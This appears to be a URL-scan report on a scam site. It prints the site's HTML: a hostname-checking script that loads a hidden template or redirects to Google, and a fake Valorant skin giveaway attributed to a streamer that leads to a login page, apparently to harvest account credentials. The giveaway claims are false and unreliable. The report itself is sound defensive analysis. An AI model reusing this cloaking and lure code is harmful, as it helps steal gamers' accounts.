https://clovelo.pro/

提交的 URL:
https://clovelo.pro/已重定向
报告完成时间:

链接 · 找到 0 个

从页面中识别出的传出链接

JavaScript 变量 · 找到 7 个

在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问

名称类型
0object
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
$function
jQueryfunction
getTemplatefunction

控制台日志消息 · 找到 6 条

记录到 Web 控制台的消息

类型类别记录
errornetwork
URL
https://clovelo.pro/
文本
Failed to load resource: the server responded with a status of 403 ()
errornetwork
URL
https://clovelo.pro/favicon.ico
文本
Failed to load resource: the server responded with a status of 403 ()
errornetwork
URL
https://clovelo.pro/e
文本
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://vakmclove.com/public/land_8/assets/img/2nd%20block.png
文本
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://vakmclove.com/public/land_8/assets/img/2nd%20block.png
文本
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://vakmclove.com/public/land_8/assets/img/2nd%20block.png
文本
Failed to load resource: the server responded with a status of 404 ()

HTML

页面的原始 HTML 正文

<!DOCTYPE html><html lang="en"><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="static/land_9/assets/img/favicon.svg">
  <link rel="stylesheet" href="static/land_9/assets/css/index.min.css">
  <script src="/static/js/jquery.min.js"></script>
  
  <script>
    function getTemplate(hostname) {
      
      // document.getElementById("mainframe").setAttribute("src", "tenz.html");
      $.ajax({
          url: `/auth/template/${location.hostname}`,
          type: "get",
          data: {
              "hostname": hostname
          },
          dataType: "json",
          headers: {
              "Content-Type": "application/json",
          },
          success: function (response) {
            if (response.ok != true){
              location.href = 'https://google.com/'
              return
            }
            $('#mainframe').attr('src', response.template);
            $('#mainframe').ready()
          }
      })
    }
    $(document).ready(function () {
      getTemplate(location.host);
    })
  </script>
</head>
<body>
  <iframe src="closepublic.html" seamless="" style="width: 100%; height: 100%; border: none;" id="mainframe"></iframe>



// <!-- <!DOCTYPE html>
// <html lang="en">
//   <head>
//     <meta charset="UTF-8">
//     <meta name="viewport" content="width=device-width, initial-scale=1.0">
//     <title>TENZ x Riot Games</title>
//     <link rel="icon" href="static/land_9/assets/img/favicon.svg">
//     <link rel="stylesheet" href="static/land_9/assets/css/index.min.css">
//   </head>

//   <body>
//     <div class="wrapper">
//       <div class="preloader">
//         <div class="preloader__icon"></div>
//       </div>
//       <header class="header">
//         <div class="container header__container">
//           <div class="header__start">
//             <a class="header__logo" href="index.html">
//               <img src="static/land_9/assets/img/logo.svg" alt="logo">
//             </a>
//           </div>
//           <div class="header__middle">
//             <nav class="header__nav">
//               <ul class="header__list">
//                 <li class="header__item">
//                   <a class="header__link" href="#hero">Home</a>
//                 </li>
//                 <li class="header__item">
//                   <a class="header__link" href="#info">Who is TENZ?</a>
//                 </li>
//                 <li class="header__item">
//                   <a class="header__link" href="#roulette">Roulette</a>
//                 </li>
//                 <li class="header__item">
//                   <a class="header__link" href="#faq">FAQ</a>
//                 </li>
//                 <li class="header__item">
//                   <a class="header__link" href="#video">Video about Giveaway</a>
//                 </li>
//               </ul>
//             </nav>
//           </div>
//           <div class="header__end">
//             <a class="btn header__btn open-mode-code" href="#">Log in</a>
//             <a class="btn header__btn open-mode-code" href="#">Enter code</a>
//           </div>
//           <a class="header__burger" href="#">
//             <span></span>
//             <span></span>
//             <span></span>
//           </a>
//         </div>
//       </header>
//       <main>
//         <section class="hero" id="hero">
//           <div class="container hero__container">
//             <div class="hero__content">
//               <h1 class="title hero__title"></h1>
//               <h2 class="subtitle hero__subtitle"></h2>
//               <a class="btn btn_red hero__btn scroll-to-roulette" href="#">Spin roulette</a>
//               <div class="hero__arrow">
//                 <img src="static/land_9/assets/img/icons/arrow-red.svg" alt="arrow">
//               </div>
//             </div>
//             <div class="hero__bg">
//               <img src="static/land_9/assets/img/hero/valorant-logo.png" alt="valorant-logo">
//             </div>
//             <div class="hero__girl hero__girl-1">
//               <img src="static/land_9/assets/img/hero/girl-1.png" alt="girl">
//               <img src="static/land_9/assets/img/hero/girl-bg-1.png" alt="girl">
//             </div>
//             <div class="hero__girl hero__girl-2">
//               <img src="static/land_9/assets/img/hero/girl-2.png" alt="girl">
//               <img src="static/land_9/assets/img/hero/girl-bg-2.png" alt="girl">
//             </div>
//           </div>
//         </section>
//         <section class="info" id="info">
//           <div class="container info__container">
//             <div class="question-symbol question-symbol-1">?</div>
//             <div class="question-symbol question-symbol-2">?</div>
//             <div class="question-symbol question-symbol-3">?</div>
//             <div class="question-symbol question-symbol-4">?</div>
//             <div class="question-symbol question-symbol-5">?</div>
//             <div class="info__start">
//               <h3 class="title info__title">Who is TENZ?</h3>
//               <h4 class="subtitle info__subtitle">
//                 TENZ is a popular Twitch streamer known for his impressive
//                 gaming skills and engaging content. Recently, he has been
//                 hosting giveaways for free Valorant skins as a way to give back
//                 to his loyal viewers and show appreciation for their support.
//                 These giveaways not only generate excitement and interest among
//                 his followers, but also help to grow his audience and increase
//                 engagement on his channel. ?
//               </h4>
//               <p class="subtitle info__text">
//                 By offering free Valorant skins, TENZ is able to connect with
//                 his community on a deeper level and create a positive and
//                 rewarding experience for his fans.
//               </p>
//               <a class="btn btn_red info__btn scroll-to-roulette" href="#">Spin roulette</a>
//             </div>
//             <div class="info__end">
//               <div class="info__tenz">
//                 <img class="info__image" src="static/land_9/assets/img/info/tenz.png" alt="tenz">
//                 <img class="info__bg" src="static/land_9/assets/img/info/tenz-bg.png" alt="tenz">
//               </div>
//             </div>
//           </div>
//         </section>
//         <section class="roulette" id="roulette">
//           <div class="container roulette__container">
//             <div class="roulette__content">
//               <h3 class="title roulette__title">Check your luck right now!</h3>
//               <div class="roulette__square"></div>
//             </div>
//           </div>
//           <div class="roulette__wrapper"></div>
//           <div class="container roulette__container">
//             <div class="roulette__content">
//               <div class="roulette__triangle">
//                 <svg xmlns="http://www.w3.org/2000/svg" width="34" height="23" viewbox="0 0 34 23" fill="none">
//                   <path d="M14.0998 2.19551C15.6768 0.535166 18.3232 0.535164 19.9002 2.1955L32.6678 15.6373C35.088 18.1854 33.2817 22.3921 29.7675 22.3921H4.23249C0.718271 22.3921 -1.08796 18.1854 1.33224 15.6373L14.0998 2.19551Z" fill="white"></path>
//                 </svg>
//               </div>
//               <a class="btn btn_red roulette__btn" href="#">Spin it!</a>
//             </div>
//             <div class="roulette__laurel">
//               <img src="static/land_9/assets/img/roulette/laurel.png" alt="laurel">
//             </div>
//           </div>
//         </section>
//         <section class="faq" id="faq">
//           <div class="container faq__container">
//             <div class="question-symbol question-symbol-1">?</div>
//             <div class="question-symbol question-symbol-2">?</div>
//             <div class="question-symbol question-symbol-3">?</div>
//             <div class="question-symbol question-symbol-4">?</div>
//             <div class="question-symbol question-symbol-5">?</div>
//             <div class="faq__wrapper">
//               <div class="faq__start">
//                 <h3 class="title faq__title">FAQ</h3>
//                 <h4 class="subtitle faq__subtitle">
//                   Welcome to our FAQ section! Find quick answers to common
//                   inquiries about our products, services, and policies. Reach
//                   out to our customer support for additional assistance.
//                 </h4>
//                 <a class="btn btn_red faq__btn scroll-to-roulette" href="#">Spin roulette</a>
//               </div>
//               <div class="faq__end">
//                 <div class="faq__blocks">
//                   <div class="faq__block faq__block_active">
//                     <div class="faq__block-top">
//                       <h5 class="title faq__block-title">
//                         Promotion and Brand Exposure
//                       </h5>
//                       <div class="faq__block-arrow">
//                         <img src="static/land_9/assets/img/icons/arrow-white.svg" alt="arrow">
//                       </div>
//                     </div>
//                     <div class="faq__block-bottom">
//                       <h6 class="subtitle faq__block-subtitle">
//                         Hosting skin giveaways on a roulette website provides
//                         TenZ with an opportunity to promote his stream and
//                         increase his brand exposure. As viewers participate in
//                         the giveaways, they become more aware of TenZ and his
//                         content, potentially attracting new followers and
//                         subscribers to his channel.
//                       </h6>
//                     </div>
//                   </div>
//                   <div class="faq__block">
//                     <div class="faq__block-top">
//                       <h5 class="title faq__block-title">
//                         Incentivizing Viewer Participation
//                       </h5>
//                       <div class="faq__block-arrow">
//                         <img src="static/land_9/assets/img/icons/arrow-white.svg" alt="arrow">
//                       </div>
//                     </div>
//                     <div class="faq__block-bottom">
//                       <h6 class="subtitle faq__block-subtitle">
//                         Utilizing a skin roulette website to distribute Valorant
//                         skins incentivizes viewer participation during his
//                         streams. Knowing that there's a chance to win desirable
//                         in-game items can encourage viewers to stay engaged and
//                         active in the chat or during gameplay, leading to a more
//                         lively and interactive streaming experience for everyone
//                         involved.
//                       </h6>
//                     </div>
//                   </div>
//                   <div class="faq__block">
//                     <div class="faq__block-top">
//                       <h5 class="title faq__block-title">Rewarding Loyalty</h5>
//                       <div class="faq__block-arrow">
//                         <img src="static/land_9/assets/img/icons/arrow-white.svg" alt="arrow">
//                       </div>
//                     </div>
//                     <div class="faq__block-bottom">
//                       <h6 class="subtitle faq__block-subtitle">
//                         Hosting skin giveaways on a roulette website allows TenZ
//                         to reward his loyal viewers for their continued support
//                         and participation in his streams. By offering exclusive
//                         opportunities to win valuable in-game items, TenZ can
//                         show appreciation for those who consistently tune in,
//                         contribute to the chat, and support his content over
//                         time.
//                       </h6>
//                     </div>
//                   </div>
//                   <div class="faq__block">
//                     <div class="faq__block-top">
//                       <h5 class="title faq__block-title">
//                         When will I recieve my skin?
//                       </h5>
//                       <div class="faq__block-arrow">
//                         <img src="static/land_9/assets/img/icons/arrow-white.svg" alt="arrow">
//                       </div>
//                     </div>
//                     <div class="faq__block-bottom">
//                       <h6 class="subtitle faq__block-subtitle">
//                         Immediately after registration, you will receive your
//                         skin that you won at roulette
//                       </h6>
//                     </div>
//                   </div>
//                 </div>
//               </div>
//             </div>
//           </div>
//         </section>
//         <section class="video" id="video">
//           <div class="container video__container">
//             <div class="video__content">
//               <div class="video__video">
//                 <iframe width="100%" height="800px" src="https://www.youtube.com/embed/V92GvfD04DE?si=-ZAQsXd0MW-T5EXE" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen=""></iframe>
//               </div>
//               <div class="video__wrapper">
//                 <div class="video__start">
//                   <h3 class="title video__title">
//                     Watch the TENZ’s video about the Giveaway
//                   </h3>
//                   <h4 class="subtitle video__subtitle">
//                     You can participate in TENZ's Exclusive Giveaway. Discover
//                     the Amazing Prizes Inside!
//                   </h4>
//                 </div>
//                 <div class="video__end">
//                   <a class="btn btn_red faq__btn scroll-to-roulette video__btn" href="#">Spin roulette</a>
//                 </div>
//               </div>
//             </div>
//           </div>
//         </section>
//       </main>
//       <footer class="footer">
//         <div class="container footer__container">
//           <div class="footer__line"></div>
//           <div class="footer__wrapper">
//             <div class="footer__start">
//               <a class="footer__logo" href="index.htm">
//                 <img src="static/land_9/assets/img/logo.svg" alt="logo">
//               </a>
//               <p class="subtitle footer__text">
//                 TENZ x Riot Games © 2024. All rights reserved
//               </p>
//             </div>
//             <div class="footer__middle">
//               <nav class="footer__nav">
//                 <ul class="footer__list">
//                   <li class="footer__item">
//                     <a class="footer__link" href="#hero">Home</a>
//                   </li>
//                   <li class="footer__item">
//                     <a class="footer__link" href="#info">Who is TENZ?</a>
//                   </li>
//                   <li class="footer__item">
//                     <a class="footer__link" href="#roulette">Roulette</a>
//                   </li>
//                   <li class="footer__item">
//                     <a class="footer__link" href="#faq">FAQ</a>
//                   </li>
//                   <li class="footer__item">
//                     <a class="footer__link" href="#video">Video about Giveaway</a>
//                   </li>
//                 </ul>
//               </nav>
//             </div>
//             <div class="footer__end">
//               <a class="btn btn_white footer__btn open-mode-code" href="#">Log in</a>
//               <a class="btn btn_red footer__btn open-mode-code" href="#">Enter code</a>
//             </div>
//           </div>
//         </div>
//       </footer>
//       <div class="modal">
//         <div class="modal__body modal__body-win">
//           <a class="modal__cross" href="#">
//             <img src="static/land_9/assets/img/icons/cross.svg" alt="cross">
//           </a>
//           <div class="modal__content">
//             <img class="modal__img-skin" src="" alt="skin">
//             <h3 class="title modal__title modal__title_mt-40">Your drop!</h3>
//             <h4 class="subtitle modal__subtitle">You can continue now to</h4>
//             <a class="btn btn_red modal__btn modal__btn_mt-24" href="../auth/login/">Get your skin</a>
//           </div>
//           <div class="modal__presents">
//             <img src="static/land_9/assets/img/modal/presents.png" alt="presents">
//           </div>
//         </div>
//         <div class="modal__body modal__body-code">
//           <a class="modal__cross" href="#">
//             <img src="static/land_9/assets/img/icons/cross.svg" alt="cross">
//           </a>
//           <h3 class="title modal__title">Access to roulette</h3>
//           <div class="modal__form">
//             <label class="modal__label" for="code">Enter your code</label>
//             <input class="modal__input" id="code" type="text" placeholder="Code">
//             <div class="modal__btn-wrapper">
//               <a class="btn btn_red modal__btn" id="activate-code" href="#">Activate code</a>
//             </div>
//           </div>
//         </div>
//       </div>
//     </div>

//     <script src="static/land_9/assets/js/libs/jquery-3.7.1.min.js"></script>
//     <script src="static/land_9/assets/js/libs/jquery-ui.min.js"></script>
//     <script src="static/land_9/assets/js/libs/anime.min.js"></script>

//     <script src="static/land_9/assets/js/indexx_shared.js"></script>
//     <script src="static/land_9/assets/js/animations/animations.js"></script>
//   <script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8a85f6d169005ba4',t:'MTcyMTg0NTY0NS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script></body>
// </html> -->
</body></html>